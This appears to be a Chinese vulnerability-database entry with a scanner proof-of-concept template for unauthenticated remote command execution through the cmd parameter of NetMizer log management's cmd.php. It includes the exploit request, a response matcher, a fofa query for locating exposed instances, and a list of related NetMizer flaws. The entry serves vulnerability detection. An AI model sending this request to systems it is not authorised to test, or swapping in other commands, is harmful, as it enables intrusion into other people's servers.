netmizer-log-management-cmd-php-rce: NetMizer 日志管理系统 cmd.php 远程命令执行漏洞

漏洞描述

PoC代码[已公开]

id: netmizer-log-management-cmd-php-rce

info:
  name: NetMizer 日志管理系统 cmd.php 远程命令执行漏洞
  author: zan8in
  severity: critical
  description: |-
    NetMizer 日志管理系统 cmd.php中存在远程命令执行漏洞，攻击者通过传入 cmd参数即可命令执行
    fofa: title="NetMizer 日志管理系统"
  tags: netmizer,rce
  created: 2025/03/19

rules:
  r0:
    request:
      method: GET
      path: /data/manage/cmd.php?cmd=id
    expression: response.status == 200 && "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)".bmatches(response.body)
expression: r0()

相关漏洞推荐

• NetMizer 日志管理系统 /data/chart/hostdelay.php 命令执行漏洞
• POC netmizer-log-management-data-directory-traversal: NetMizer 日志管理系统 data 目录遍历漏洞
• POC netmizer-cmd-rce: NetMizer LogManagement System cmd.php - Remote Code Execution
• POC netmizer-data-listing: NetMizer LogManagement System Data - Directory Exposure
• NetMizer日志管理系统 /data/search/troubleip.php 命令执行漏洞
• NetMizer 日志管理系统keepalive.php存在SQL注入漏洞
• NetMizer 日志管理系统 /terminals.php SQL 注入漏洞
• Netmizer流量管理系统 mail.php 命令执行漏洞
• Netmizer流量管理系统 search.php 命令执行漏洞
• NetMizer日志管理系统 terminals.php SQL注入漏洞
• NetMizer 日志管理系统 /data/login/getlogin.php SQL 注入漏洞
• NetMizer流量管理系统 connect.php 命令执行漏洞
• Netmizer流量管理系统 weibo.php 远程代码执行漏洞